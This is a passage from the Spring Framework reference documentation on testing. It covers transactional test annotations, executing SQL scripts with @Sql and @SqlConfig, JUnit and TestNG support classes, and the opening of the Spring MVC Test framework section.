committed!\n\t\t\tTestTransaction.flagForCommit();\n\t\t\tTestTransaction.end();\n\t\t\tassertFalse(TestTransaction.isActive());\n\t\t\tassertNumUsers(0);\n\n\t\t\tTestTransaction.start();\n\t\t\t\/\/ perform other actions against the database that will\n\t\t\t\/\/ be automatically rolled back after the test completes...\n\t\t}\n\n\t\tprotected void assertNumUsers(int expected) {\n\t\t\tassertEquals(\"Number of rows in the [user] table.\", expected, countRowsInTable(\"user\"));\n\t\t}\n\t}\n----\n\n[[testcontext-tx-before-and-after-tx]]\n===== Executing code outside of a transaction\n\nOccasionally you need to execute certain code before or after a transactional test method\nbut outside the transactional context -- for example, to verify the initial database state\nprior to execution of your test or to verify expected transactional commit behavior after\ntest execution (if the test was configured not to roll back the transaction).\n`TransactionalTestExecutionListener` supports the `@BeforeTransaction` and\n`@AfterTransaction` annotations exactly for such scenarios. Simply annotate any `void`\nmethod in your test class with one of these annotations, and the\n`TransactionalTestExecutionListener` ensures that your __before transaction method__ or\n__after transaction method__ is executed at the appropriate time.\n\n[TIP]\n====\nAny __before methods__ (such as methods annotated with JUnit's `@Before`) and any __after\nmethods__ (such as methods annotated with JUnit's `@After`) are executed __within__ a\ntransaction. In addition, methods annotated with `@BeforeTransaction` or\n`@AfterTransaction` are naturally not executed for test methods that are not configured\nto run within a transaction.\n====\n\n[[testcontext-tx-mgr-config]]\n===== Configuring a transaction manager\n\n`TransactionalTestExecutionListener` expects a `PlatformTransactionManager` bean to be\ndefined in the Spring `ApplicationContext` for the test. In case there are multiple\ninstances of `PlatformTransactionManager` within the test's `ApplicationContext`, a\n_qualifier_ may be declared via `@Transactional(\"myTxMgr\")` or\n`@Transactional(transactionManager = \"myTxMgr\")`, or `TransactionManagementConfigurer`\ncan be implemented by an `@Configuration` class. Consult the javadocs for\n`TestContextTransactionUtils.retrieveTransactionManager()` for details on the algorithm\nused to look up a transaction manager in the test's `ApplicationContext`.\n\n[[testcontext-tx-annotation-demo]]\n===== Demonstration of all transaction-related annotations\n\nThe following JUnit-based example displays a fictitious integration testing scenario\nhighlighting all transaction-related annotations. The example is **not** intended to\ndemonstrate best practices but rather to demonstrate how these annotations can be used.\nConsult the <<integration-testing-annotations,annotation support>> section for further\ninformation and configuration examples. <<testcontext-executing-sql-declaratively-tx,\nTransaction management for `@Sql`>> contains an additional example using `@Sql` for\ndeclarative SQL script execution with default transaction rollback semantics.\n\n[source,java,indent=0]\n[subs=\"verbatim,quotes\"]\n----\n\t@RunWith(SpringRunner.class)\n\t@ContextConfiguration\n\t**@Transactional(transactionManager = \"txMgr\")**\n\t**@Commit**\n\tpublic class FictitiousTransactionalTest {\n\n\t\t**@BeforeTransaction**\n\t\tvoid verifyInitialDatabaseState() {\n\t\t\t\/\/ logic to verify the initial state before a transaction is started\n\t\t}\n\n\t\t@Before\n\t\tpublic void setUpTestDataWithinTransaction() {\n\t\t\t\/\/ set up test data within the transaction\n\t\t}\n\n\t\t@Test\n\t\t\/\/ overrides the class-level @Commit setting\n\t\t**@Rollback**\n\t\tpublic void modifyDatabaseWithinTransaction() {\n\t\t\t\/\/ logic which uses the test data and modifies database state\n\t\t}\n\n\t\t@After\n\t\tpublic void tearDownWithinTransaction() {\n\t\t\t\/\/ execute \"tear down\" logic within the transaction\n\t\t}\n\n\t\t**@AfterTransaction**\n\t\tvoid verifyFinalDatabaseState() {\n\t\t\t\/\/ logic to verify the final state after transaction has rolled back\n\t\t}\n\n\t}\n----\n\n[[testcontext-tx-false-positives]]\n.Avoid false positives when testing ORM code\n[NOTE]\n====\nWhen you test application code that manipulates the state of the Hibernate or JPA session,\nmake sure to __flush__ the underlying session within test methods that execute that code.\nFailing to flush the underlying session can produce __false positives__: your test may\npass, but the same code throws an exception in a live, production environment. In the\nfollowing Hibernate-based example test case, one method demonstrates a false positive,\nand the other method correctly exposes the results of flushing the session. Note that\nthis applies to any ORM frameworks that maintain an in-memory __unit of work__.\n\n[source,java,indent=0]\n[subs=\"verbatim,quotes\"]\n----\n\t\/\/ ...\n\n\t@Autowired\n\tprivate SessionFactory sessionFactory;\n\n\t@Test \/\/ no expected exception!\n\tpublic void falsePositive() {\n\t\tupdateEntityInHibernateSession();\n\t\t\/\/ False positive: an exception will be thrown once the Hibernate\n\t\t\/\/ Session is finally flushed (i.e., in production code)\n\t}\n\n\t@Test(expected = ...)\n\tpublic void updateWithSessionFlush() {\n\t\tupdateEntityInHibernateSession();\n\t\t\/\/ Manual flush is required to avoid false positive in test\n\t\tsessionFactory.getCurrentSession().flush();\n\t}\n\n\t\/\/ ...\n----\n\nOr for JPA:\n\n[source,java,indent=0]\n[subs=\"verbatim,quotes\"]\n----\n\t\/\/ ...\n\n\t@Autowired\n\tprivate EntityManager entityManager;\n\n\t@Test \/\/ no expected exception!\n\tpublic void falsePositive() {\n\t\tupdateEntityInJpaTransaction();\n\t\t\/\/ False positive: an exception will be thrown once the JPA\n\t\t\/\/ EntityManager is finally flushed (i.e., in production code)\n\t}\n\n\t@Test(expected = ...)\n\tpublic void updateWithEntityManagerFlush() {\n\t\tupdateEntityInJpaTransaction();\n\t\t\/\/ Manual flush is required to avoid false positive in test\n\t\tentityManager.flush();\n\t}\n\n\t\/\/ ...\n----\n====\n\n\n[[testcontext-executing-sql]]\n==== Executing SQL scripts\n\nWhen writing integration tests against a relational database, it is often beneficial\nto execute SQL scripts to modify the database schema or insert test data into tables.\nThe `spring-jdbc` module provides support for _initializing_ an embedded or existing\ndatabase by executing SQL scripts when the Spring `ApplicationContext` is loaded. See\n<<jdbc-embedded-database-support>> and <<jdbc-embedded-database-dao-testing>> for\ndetails.\n\nAlthough it is very useful to initialize a database for testing _once_ when the\n`ApplicationContext` is loaded, sometimes it is essential to be able to modify the\ndatabase _during_ integration tests. The following sections explain how to execute SQL\nscripts programmatically and declaratively during integration tests.\n\n[[testcontext-executing-sql-programmatically]]\n===== Executing SQL scripts programmatically\n\nSpring provides the following options for executing SQL scripts programmatically within\nintegration test methods.\n\n* `org.springframework.jdbc.datasource.init.ScriptUtils`\n* `org.springframework.jdbc.datasource.init.ResourceDatabasePopulator`\n* `org.springframework.test.context.junit4.AbstractTransactionalJUnit4SpringContextTests`\n* `org.springframework.test.context.testng.AbstractTransactionalTestNGSpringContextTests`\n\n`ScriptUtils` provides a collection of static utility methods for working with SQL scripts\nand is mainly intended for internal use within the framework. However, if you require\nfull control over how SQL scripts are parsed and executed, `ScriptUtils` may suit your\nneeds better than some of the other alternatives described below. Consult the javadocs for\nindividual methods in `ScriptUtils` for further details.\n\n`ResourceDatabasePopulator` provides a simple object-based API for programmatically\npopulating, initializing, or cleaning up a database using SQL scripts defined in\nexternal resources. `ResourceDatabasePopulator` provides options for configuring the\ncharacter encoding, statement separator, comment delimiters, and error handling flags\nused when parsing and executing the scripts, and each of the configuration options has\na reasonable default value. Consult the javadocs for details on default values. To\nexecute the scripts configured in a `ResourceDatabasePopulator`, you can invoke either\nthe `populate(Connection)` method to execute the populator against a\n`java.sql.Connection` or the `execute(DataSource)` method to execute the populator\nagainst a `javax.sql.DataSource`. The following example specifies SQL scripts for a test\nschema and test data, sets the statement separator to `\"@@\"`, and then executes the\nscripts against a `DataSource`.\n\n[source,java,indent=0]\n[subs=\"verbatim,quotes\"]\n----\n\t@Test\n\tpublic void databaseTest {\n\t\tResourceDatabasePopulator populator = new ResourceDatabasePopulator();\n\t\tpopulator.addScripts(\n\t\t\tnew ClassPathResource(\"test-schema.sql\"), \n\t\t\tnew ClassPathResource(\"test-data.sql\"));\n\t\tpopulator.setSeparator(\"@@\");\n\t\tpopulator.execute(this.dataSource);\n\t\t\/\/ execute code that uses the test schema and data\n\t}\n----\n\nNote that `ResourceDatabasePopulator` internally delegates to `ScriptUtils` for parsing\nand executing SQL scripts. Similarly, the `executeSqlScript(..)` methods in\n<<testcontext-support-classes-junit4, `AbstractTransactionalJUnit4SpringContextTests`>> and\n<<testcontext-support-classes-testng, `AbstractTransactionalTestNGSpringContextTests`>>\ninternally use a `ResourceDatabasePopulator` for executing SQL scripts. Consult the javadocs\nfor the various `executeSqlScript(..)` methods for further details.\n\n\n[[testcontext-executing-sql-declaratively]]\n===== Executing SQL scripts declaratively with `@Sql`\n\nIn addition to the aforementioned mechanisms for executing SQL scripts\n_programmatically_, SQL scripts can also be configured _declaratively_ in the Spring\nTestContext Framework. Specifically, the `@Sql` annotation can be declared on a test\nclass or test method to configure the resource paths to SQL scripts that should be\nexecuted against a given database either before or after an integration test method. Note\nthat method-level declarations override class-level declarations and that support for\n`@Sql` is provided by the `SqlScriptsTestExecutionListener` which is enabled by default.\n\n*Path resource semantics*\n\nEach path will be interpreted as a Spring `Resource`. A plain path -- for example,\n`\"schema.sql\"` -- will be treated as a classpath resource that is _relative_ to the\npackage in which the test class is defined. A path starting with a slash will be treated\nas an _absolute_ classpath resource, for example: `\"\/org\/example\/schema.sql\"`. A path\nwhich references a URL (e.g., a path prefixed with `classpath:`, `file:`, `http:`, etc.)\nwill be loaded using the specified resource protocol.\n\nThe following example demonstrates how to use `@Sql` at the class level and at the method\nlevel within a JUnit-based integration test class.\n\n[source,java,indent=0]\n[subs=\"verbatim,quotes\"]\n----\n\t@RunWith(SpringRunner.class)\n\t@ContextConfiguration\n\t@Sql(\"\/test-schema.sql\")\n\tpublic class DatabaseTests {\n\n\t\t@Test\n\t\tpublic void emptySchemaTest {\n\t\t\t\/\/ execute code that uses the test schema without any test data\n\t\t}\n\n\t\t@Test\n\t\t@Sql({\"\/test-schema.sql\", \"\/test-user-data.sql\"})\n\t\tpublic void userTest {\n\t\t\t\/\/ execute code that uses the test schema and test data\n\t\t}\n\t}\n----\n\n*Default script detection*\n\nIf no SQL scripts are specified, an attempt will be made to detect a `default` script\ndepending on where `@Sql` is declared. If a default cannot be detected, an\n`IllegalStateException` will be thrown.\n\n* __class-level declaration__: if the annotated test class is `com.example.MyTest`, the\n\tcorresponding default script is `\"classpath:com\/example\/MyTest.sql\"`.\n* __method-level declaration__: if the annotated test method is named `testMethod()` and is\n\tdefined in the class `com.example.MyTest`, the corresponding default script is\n\t`\"classpath:com\/example\/MyTest.testMethod.sql\"`.\n\n*Declaring multiple `@Sql` sets*\n\nIf multiple sets of SQL scripts need to be configured for a given test class or test\nmethod but with different syntax configuration, different error handling rules, or\ndifferent execution phases per set, it is possible to declare multiple instances of\n`@Sql`. With Java 8, `@Sql` can be used as a _repeatable_ annotation. Otherwise, the\n`@SqlGroup` annotation can be used as an explicit container for declaring multiple\ninstances of `@Sql`.\n\nThe following example demonstrates the use of `@Sql` as a repeatable annotation using\nJava 8. In this scenario the `test-schema.sql` script uses a different syntax for\nsingle-line comments.\n\n[source,java,indent=0]\n[subs=\"verbatim,quotes\"]\n----\n\t@Test\n\t@Sql(scripts = \"\/test-schema.sql\", config = @SqlConfig(commentPrefix = \"`\"))\n\t@Sql(\"\/test-user-data.sql\")\n\tpublic void userTest {\n\t\t\/\/ execute code that uses the test schema and test data\n\t}\n----\n\nThe following example is identical to the above except that the `@Sql` declarations are\ngrouped together within `@SqlGroup` for compatibility with Java 6 and Java 7.\n\n[source,java,indent=0]\n[subs=\"verbatim,quotes\"]\n----\n\t@Test\n\t@SqlGroup({\n\t\t@Sql(scripts = \"\/test-schema.sql\", config = @SqlConfig(commentPrefix = \"`\")),\n\t\t@Sql(\"\/test-user-data.sql\")\n\t)}\n\tpublic void userTest {\n\t\t\/\/ execute code that uses the test schema and test data\n\t}\n----\n\n*Script execution phases*\n\nBy default, SQL scripts will be executed _before_ the corresponding test method. However,\nif a particular set of scripts needs to be executed _after_ the test method -- for\nexample, to clean up database state -- the `executionPhase` attribute in `@Sql` can be\nused as seen in the following example. Note that `ISOLATED` and `AFTER_TEST_METHOD` are\nstatically imported from `Sql.TransactionMode` and `Sql.ExecutionPhase` respectively.\n\n[source,java,indent=0]\n[subs=\"verbatim,quotes\"]\n----\n\t@Test\n\t@Sql(\n\t\tscripts = \"create-test-data.sql\",\n\t\tconfig = @SqlConfig(transactionMode = ISOLATED)\n\t)\n\t@Sql(\n\t\tscripts = \"delete-test-data.sql\",\n\t\tconfig = @SqlConfig(transactionMode = ISOLATED),\n\t\texecutionPhase = AFTER_TEST_METHOD\n\t)\n\tpublic void userTest {\n\t\t\/\/ execute code that needs the test data to be committed\n\t\t\/\/ to the database outside of the test's transaction\n\t}\n----\n\n*Script configuration with `@SqlConfig`*\n\nConfiguration for script parsing and error handling can be configured via the\n`@SqlConfig` annotation. When declared as a class-level annotation on an integration test\nclass, `@SqlConfig` serves as _global_ configuration for all SQL scripts within the test\nclass hierarchy. When declared directly via the `config` attribute of the `@Sql`\nannotation, `@SqlConfig` serves as _local_ configuration for the SQL scripts declared\nwithin the enclosing `@Sql` annotation. Every attribute in `@SqlConfig` has an implicit\ndefault value which is documented in the javadocs of the corresponding attribute. Due to\nthe rules defined for annotation attributes in the Java Language Specification, it is\nunfortunately not possible to assign a value of `null` to an annotation attribute. Thus,\nin order to support overrides of inherited global configuration, `@SqlConfig` attributes\nhave an explicit default value of either `\"\"` for Strings or `DEFAULT` for Enums. This\napproach allows local declarations of `@SqlConfig` to selectively override individual\nattributes from global declarations of `@SqlConfig` by providing a value other than `\"\"`\nor `DEFAULT`. Global `@SqlConfig` attributes are inherited whenever local `@SqlConfig`\nattributes do not supply an explicit value other than `\"\"` or `DEFAULT`. Explicit _local_\nconfiguration therefore overrides _global_ configuration.\n\nThe configuration options provided by `@Sql` and `@SqlConfig` are equivalent to those\nsupported by `ScriptUtils` and `ResourceDatabasePopulator` but are a superset of those\nprovided by the `<jdbc:initialize-database\/>` XML namespace element. Consult the javadocs\nof individual attributes in `@Sql` and `@SqlConfig` for details.\n\n[[testcontext-executing-sql-declaratively-tx]]\n*Transaction management for `@Sql`*\n\nBy default, the `SqlScriptsTestExecutionListener` will infer the desired transaction\nsemantics for scripts configured via `@Sql`. Specifically, SQL scripts will be executed\nwithout a transaction, within an existing Spring-managed transaction -- for example, a\ntransaction managed by the `TransactionalTestExecutionListener` for a test annotated with\n`@Transactional` -- or within an isolated transaction, depending on the configured value\nof the `transactionMode` attribute in `@SqlConfig` and the presence of a\n`PlatformTransactionManager` in the test's `ApplicationContext`. As a bare minimum\nhowever, a `javax.sql.DataSource` must be present in the test's `ApplicationContext`.\n\nIf the algorithms used by `SqlScriptsTestExecutionListener` to detect a `DataSource` and\n`PlatformTransactionManager` and infer the transaction semantics do not suit your needs,\nyou may specify explicit names via the `dataSource` and `transactionManager` attributes\nof `@SqlConfig`. Furthermore, the transaction propagation behavior can be controlled via\nthe `transactionMode` attribute of `@SqlConfig` -- for example, if scripts should be\nexecuted in an isolated transaction. Although a thorough discussion of all supported\noptions for transaction management with `@Sql` is beyond the scope of this reference\nmanual, the javadocs for `@SqlConfig` and `SqlScriptsTestExecutionListener` provide\ndetailed information, and the following example demonstrates a typical testing scenario\nusing JUnit and transactional tests with `@Sql`. Note that there is no need to clean up\nthe database after the `usersTest()` method is executed since any changes made to the\ndatabase (either within the the test method or within the `\/test-data.sql` script) will\nbe automatically rolled back by the `TransactionalTestExecutionListener` (see\n<<testcontext-tx,transaction management>> for details).\n\n[source,java,indent=0]\n[subs=\"verbatim,quotes\"]\n----\n\t@RunWith(SpringRunner.class)\n\t@ContextConfiguration(classes = TestDatabaseConfig.class)\n\t@Transactional\n\tpublic class TransactionalSqlScriptsTests {\n\n\t\tprotected JdbcTemplate jdbcTemplate;\n\n\t\t@Autowired\n\t\tpublic void setDataSource(DataSource dataSource) {\n\t\t\tthis.jdbcTemplate = new JdbcTemplate(dataSource);\n\t\t}\n\n\t\t@Test\n\t\t@Sql(\"\/test-data.sql\")\n\t\tpublic void usersTest() {\n\t\t\t\/\/ verify state in test database:\n\t\t\tassertNumUsers(2);\n\t\t\t\/\/ execute code that uses the test data...\n\t\t}\n\n\t\tprotected int countRowsInTable(String tableName) {\n\t\t\treturn JdbcTestUtils.countRowsInTable(this.jdbcTemplate, tableName);\n\t\t}\n\n\t\tprotected void assertNumUsers(int expected) {\n\t\t\tassertEquals(\"Number of rows in the [user] table.\", expected, countRowsInTable(\"user\"));\n\t\t}\n\t}\n----\n\n\n[[testcontext-support-classes]]\n==== TestContext Framework support classes\n\n\n[[testcontext-junit4-runner]]\n===== Spring JUnit Runner\n\nThe __Spring TestContext Framework__ offers full integration with JUnit 4 through a\ncustom runner (supported on JUnit 4.12 or higher). By annotating test classes with\n`@RunWith(SpringJUnit4ClassRunner.class)` or the shorter `@RunWith(SpringRunner.class)`\nvariant, developers can implement standard JUnit-based unit and integration tests and\nsimultaneously reap the benefits of the TestContext framework such as support for loading\napplication contexts, dependency injection of test instances, transactional test method\nexecution, and so on. If you would like to use the Spring TestContext Framework with an\nalternative runner such as JUnit's `Parameterized` or third-party runners such as the\n`MockitoJUnitRunner`, you may optionally use <<testcontext-junit4-rules,Spring's support\nfor JUnit rules>> instead.\n\nThe following code listing displays the minimal requirements for configuring a test class\nto run with the custom Spring `Runner`. `@TestExecutionListeners` is configured with an\nempty list in order to disable the default listeners, which otherwise would require an\n`ApplicationContext` to be configured through `@ContextConfiguration`.\n\n[source,java,indent=0]\n[subs=\"verbatim,quotes\"]\n----\n@RunWith(SpringRunner.class)\n@TestExecutionListeners({})\npublic class SimpleTest {\n\n @Test\n public void testMethod() {\n \/\/ execute test logic...\n }\n}\n----\n\n\n[[testcontext-junit4-rules]]\n===== Spring JUnit Rules\n\nThe `org.springframework.test.context.junit4.rules` package provides the following JUnit\n4 rules (supported on JUnit 4.12 or higher).\n\n* `SpringClassRule`\n* `SpringMethodRule`\n\n`SpringClassRule` is a JUnit `TestRule` that supports _class-level_ features of the\n_Spring TestContext Framework_; whereas, `SpringMethodRule` is a JUnit `MethodRule` that\nsupports instance-level and method-level features of the _Spring TestContext Framework_.\n\nIn contrast to the `SpringRunner`, Spring's rule-based JUnit support has the advantage\nthat it is independent of any `org.junit.runner.Runner` implementation and can therefore\nbe combined with existing alternative runners like JUnit's `Parameterized` or third-party\nrunners such as the `MockitoJUnitRunner`.\n\nIn order to support the full functionality of the TestContext framework, a\n`SpringClassRule` must be combined with a `SpringMethodRule`. The following example\ndemonstrates the proper way to declare these rules in an integration test.\n\n\n[source,java,indent=0]\n[subs=\"verbatim,quotes\"]\n----\n\/\/ Optionally specify a non-Spring Runner via @RunWith(...)\n@ContextConfiguration\npublic class IntegrationTest {\n\n @ClassRule\n public static final SpringClassRule SPRING_CLASS_RULE = new SpringClassRule();\n\n @Rule\n public final SpringMethodRule springMethodRule = new SpringMethodRule();\n\n @Test\n public void testMethod() {\n \/\/ execute test logic...\n }\n}\n----\n\n\n[[testcontext-support-classes-junit4]]\n===== JUnit support classes\n\nThe `org.springframework.test.context.junit4` package provides the following support\nclasses for JUnit-based test cases (supported on JUnit 4.12 or higher).\n\n* `AbstractJUnit4SpringContextTests`\n* `AbstractTransactionalJUnit4SpringContextTests`\n\n`AbstractJUnit4SpringContextTests` is an abstract base test class that integrates the\n__Spring TestContext Framework__ with explicit `ApplicationContext` testing support in\na JUnit 4 environment. When you extend `AbstractJUnit4SpringContextTests`, you can\naccess a `protected` `applicationContext` instance variable that can be used to perform\nexplicit bean lookups or to test the state of the context as a whole.\n\n`AbstractTransactionalJUnit4SpringContextTests` is an abstract __transactional__ extension\nof `AbstractJUnit4SpringContextTests` that adds some convenience functionality for JDBC\naccess. This class expects a `javax.sql.DataSource` bean and a `PlatformTransactionManager`\nbean to be defined in the `ApplicationContext`. When you extend\n`AbstractTransactionalJUnit4SpringContextTests` you can access a `protected` `jdbcTemplate`\ninstance variable that can be used to execute SQL statements to query the database. Such\nqueries can be used to confirm database state both __prior to__ and __after__ execution of\ndatabase-related application code, and Spring ensures that such queries run in the scope of\nthe same transaction as the application code. When used in conjunction with an ORM tool,\nbe sure to avoid <<testcontext-tx-false-positives,false positives>>. As mentioned in\n<<integration-testing-support-jdbc>>, `AbstractTransactionalJUnit4SpringContextTests`\nalso provides convenience methods which delegate to methods in `JdbcTestUtils` using the\naforementioned `jdbcTemplate`. Furthermore, `AbstractTransactionalJUnit4SpringContextTests`\nprovides an `executeSqlScript(..)` method for executing SQL scripts against the configured\n`DataSource`.\n\n[TIP]\n====\nThese classes are a convenience for extension. If you do not want your test classes to be\ntied to a Spring-specific class hierarchy, you can configure your own custom test classes\nby using `@RunWith(SpringRunner.class)` or <<testcontext-junit4-rules,Spring's\nJUnit rules>>.\n====\n\n\n[[testcontext-support-classes-testng]]\n===== TestNG support classes\n\nThe `org.springframework.test.context.testng` package provides the following support\nclasses for TestNG based test cases.\n\n* `AbstractTestNGSpringContextTests`\n* `AbstractTransactionalTestNGSpringContextTests`\n\n`AbstractTestNGSpringContextTests` is an abstract base test class that integrates the\n__Spring TestContext Framework__ with explicit `ApplicationContext` testing support in\na TestNG environment. When you extend `AbstractTestNGSpringContextTests`, you can\naccess a `protected` `applicationContext` instance variable that can be used to perform\nexplicit bean lookups or to test the state of the context as a whole.\n\n`AbstractTransactionalTestNGSpringContextTests` is an abstract __transactional__ extension\nof `AbstractTestNGSpringContextTests` that adds some convenience functionality for JDBC\naccess. This class expects a `javax.sql.DataSource` bean and a `PlatformTransactionManager`\nbean to be defined in the `ApplicationContext`. When you extend\n`AbstractTransactionalTestNGSpringContextTests` you can access a `protected` `jdbcTemplate`\ninstance variable that can be used to execute SQL statements to query the database. Such\nqueries can be used to confirm database state both __prior to__ and __after__ execution of\ndatabase-related application code, and Spring ensures that such queries run in the scope of\nthe same transaction as the application code. When used in conjunction with an ORM tool,\nbe sure to avoid <<testcontext-tx-false-positives,false positives>>. As mentioned in\n<<integration-testing-support-jdbc>>, `AbstractTransactionalTestNGSpringContextTests`\nalso provides convenience methods which delegate to methods in `JdbcTestUtils` using the\naforementioned `jdbcTemplate`. Furthermore, `AbstractTransactionalTestNGSpringContextTests`\nprovides an `executeSqlScript(..)` method for executing SQL scripts against the configured\n`DataSource`.\n\n\n[TIP]\n====\nThese classes are a convenience for extension. If you do not want your test classes to be\ntied to a Spring-specific class hierarchy, you can configure your own custom test classes\nby using `@ContextConfiguration`, `@TestExecutionListeners`, and so on, and by manually\ninstrumenting your test class with a `TestContextManager`. See the source code of\n`AbstractTestNGSpringContextTests` for an example of how to instrument your test class.\n====\n\n\n\n[[spring-mvc-test-framework]]\n=== Spring MVC Test Framework\n\nThe __Spring MVC Test framework__ provides first class support for testing Spring MVC\ncode using a fluent API that can be used with JUnit, TestNG, or any other testing\nframework. It's built on the\n{api-spring-framework}\/mock\/web\/package-summary.html[Servlet API mock objects]\nfrom the `spring-test` module and hence does _not_ use a running Servlet container. It\nuses the `DispatcherServlet` to provide full Spring MVC runtime behavior and provides support\nfor loading actual Spring configuration with the __TestContext framework__ in addition to a\nstandalone mode in which controllers may be instantiated manually and tested one at a time.\n\n__Spring MVC Test__ also provides client-side support for testing code that uses\nthe `RestTemplate`. Client-side tests mock the server responses and also do _not_\nuse a running server.\n\n[TIP]\n====\nSpring Boot provides an option to write full, end-to-end integration tests that include\na running server. If this is your goal please have a look at the\n{doc-spring-boot}\/html\/boot-features-testing.html#boot-features-testing-spring-boot-applications[Spring Boot reference page].\nFor more information on the differences between out-of-container and end-to-end\nintegration tests, see <<spring-mvc-test-vs-end-to-end-integration-tests>>.\n====\n\n\n\n[[spring-mvc-test-server]]\n==== Server-Side Tests\nIt's easy to write a plain unit test for a Spring MVC controller using JUnit or TestNG:\nsimply instantiate the controller, inject it with mocked or stubbed dependencies, and call\nits methods passing `MockHttpServletRequest`, `MockHttpServletResponse`, etc., as necessary.\nHowever, when writing such a unit test, much remains untested: for example, request\nmappings, data binding, type conversion, validation, and much more. Furthermore, other\ncontroller methods such as `@InitBinder`, `@ModelAttribute`, and `@ExceptionHandler` may\nalso be invoked as part of the request processing lifecycle.\n\nThe goal of __Spring MVC Test__ is to provide an effective way for testing controllers\nby performing requests and generating responses through the actual `DispatcherServlet`.\n\n__Spring MVC Test__ builds on the familiar <<mock-objects-servlet,\"mock\" implementations\nof the Servlet API>> available in the `spring-test` module. This allows performing\nrequests and generating responses without the need for running in a Servlet container.\nFor the most part everything should work as it does at runtime with a few notable\nexceptions as explained in <<spring-mvc-test-vs-end-to-end-integration-tests>>. Here is a\nJUnit-based example of using Spring MVC Test:\n\n[source,java,indent=0]\n----\n\timport static org.springframework.test.web.servlet.request.MockMvcRequestBuilders.*;\n\timport static org.springframework.test.web.servlet.result.MockMvcResultMatchers.*;\n\n\t@RunWith(SpringRunner.class)\n\t@WebAppConfiguration\n\t@ContextConfiguration(\"test-servlet-context.xml\")\n\tpublic class ExampleTests {\n\n\t\t@Autowired\n\t\tprivate WebApplicationContext wac;\n\n\t\tprivate MockMvc mockMvc;\n\n\t\t@Before\n\t\tpublic void setup() {\n\t\t\tthis.mockMvc = MockMvcBuilders.webAppContextSetup(this.wac).build();\n\t\t}\n\n\t\t@Test\n\t\tpublic void getAccount() throws Exception {\n\t\t\tthis.mockMvc.perform(get(\"\/accounts\/1\").accept(MediaType.parseMediaType(\"application\/json;charset=UTF-8\")))\n\t\t\t\t.andExpect(status().isOk())\n\t\t\t\t.andExpect(content().contentType(\"application\/json\"))\n\t\t\t\t.andExpect(jsonPath(\"$.name\").value(\"Lee\"));\n\t\t}\n\n\t}\n----\n\nThe above test relies on the `WebApplicationContext` support of the __TestContext framework__\nfor loading Spring configuration from an XML configuration file located in the same package\nas the test class, but Java-based and Groovy-based configuration are also supported. See these\nhttps:\/\/github.com\/spring-projects\/spring-framework\/tree\/master\/spring-test\/src\/test\/java\/org\/springframework\/test\/web\/servlet\/samples\/context[sample tests].\n\nThe `MockMvc` instance is used to perform a `GET` request to `\"\/accounts\/1\"` and verify\nthat the resulting response has status 200, the content type is `\"application\/json\"`, and the\nresponse body has a JSON property called \"name\" with the value \"Lee\". The `jsonPath`\nsyntax is supported through the Jayway https:\/\/github.com\/jayway\/JsonPath[JsonPath\nproject]. There are lots of other options for verifying the result of the performed\nrequest that will be discussed below.\n\n[[spring-mvc-test-server-static-imports]]\n===== Static Imports\nThe fluent API in the example above requires a few static imports such as\n`MockMvcRequestBuilders.{asterisk}`, `MockMvcResultMatchers.{asterisk}`, \nand `MockMvcBuilders.{asterisk}`. An easy way to find these classes is to search for\ntypes matching __\"MockMvc*\"__. If using Eclipse, be sure to add them as \n\"favorite static members\" in the Eclipse preferences under \n__Java -> Editor -> Content Assist -> Favorites__. That will allow use of content\nassist after typing the first character of the static method name. Other IDEs (e.g.\nIntelliJ) may not require any additional configuration. Just check the support for code\ncompletion on static members.\n\n[[spring-mvc-test-server-setup-options]]\n===== Setup Options\nThere are two main options for creating an instance of `MockMvc`.\nThe first is to load Spring MVC configuration through the __TestContext\nframework__, which loads the Spring configuration and injects a `WebApplicationContext`\ninto the test to use to build a `MockMvc` instance:\n\n[source,java,indent=0]\n[subs=\"verbatim,quotes\"]\n----\n\t@RunWith(SpringRunner.class)\n\t@WebAppConfiguration\n\t@ContextConfiguration(\"my-servlet-context.xml\")\n\tpublic class MyWebTests {\n\n\t\t@Autowired\n\t\tprivate WebApplicationContext wac;\n\n\t\tprivate MockMvc mockMvc;\n\n\t\t@Before\n\t\tpublic void setup() {\n\t\t\tthis.mockMvc = MockMvcBuilders.webAppContextSetup(this.wac).build();\n\t\t}\n\n\t\t\/\/ ...\n\n\t}\n----\n\nThe second is to simply create a controller instance manually without loading Spring\nconfiguration. Instead basic default configuration, roughly comparable to that of\nthe MVC JavaConfig or the MVC namespace, is automatically created and can be customized\nto a degree:\n\n[source,java,indent=0]\n[subs=\"verbatim,quotes\"]\n----\n\tpublic class MyWebTests {\n\n\t\tprivate MockMvc mockMvc;\n\n\t\t@Before\n\t\tpublic void setup() {\n\t\t\tthis.mockMvc = MockMvcBuilders.standaloneSetup(new AccountController()).build();\n\t\t}\n\n\t\t\/\/ ...\n\n\t}\n----\n\nWhich setup option should you use?\n\nThe __\"webAppContextSetup\"__ loads your actual Spring MVC configuration resulting in a\nmore complete integration test. Since the __TestContext framework__ caches the loaded\nSpring configuration, it helps keep tests running fast, even as you introduce more tests\nin your test suite. Furthermore, you can inject mock services into controllers through\nSpring configuration in order to remain focused on testing the web layer. Here is an\nexample of declaring a mock service with Mockito:\n\n[source,xml,indent=0]\n[subs=\"verbatim,quotes\"]\n----\n\t<bean id=\"accountService\" class=\"org.mockito.Mockito\" factory-method=\"mock\">\n\t\t<constructor-arg value=\"org.example.AccountService\"\/>\n\t<\/bean>\n----\n\nYou can then inject the mock service into the test in order set up and verify\nexpectations:\n\n[source,java,indent=0]\n[subs=\"verbatim,quotes\"]\n----\n\t@RunWith(SpringRunner.class)\n\t@WebAppConfiguration\n\t@ContextConfiguration(\"test-servlet-context.xml\")\n\tpublic class AccountTests {\n\n\t\t@Autowired\n\t\tprivate WebApplicationContext wac;\n\n\t\tprivate MockMvc mockMvc;\n\n\t\t@Autowired\n\t\tprivate AccountService accountService;\n\n\t\t\/\/ ...\n\n\t}\n----\n\nThe __\"standaloneSetup\"__ on the other hand is a little closer to a unit test. It tests\none controller at a time: the controller can be injected with mock dependencies manually,\nand it doesn't involve loading Spring configuration. Such tests are more focused on style\nand make it easier to see which controller is being tested, whether any specific Spring\nMVC configuration is required to work, and so on. The \"standaloneSetup\" is also a very\nconvenient way to write ad-hoc tests to verify specific behavior or to debug an issue.\n\nJust like with any \"integration vs. unit testing\" debate, there is no right or wrong\nanswer. However, using the \"standaloneSetup\" does imply the need for additional\n\"webAppContextSetup\" tests in order to verify your Spring MVC configuration.\nAlternatively, you may choose to write all tests with \"webAppContextSetup\" in order to\nalways test against your actual Spring MVC configuration.\n\n[[spring-mvc-test-server-performing-requests]]\n===== Performing Requests\nIt's easy to perform requests using any HTTP 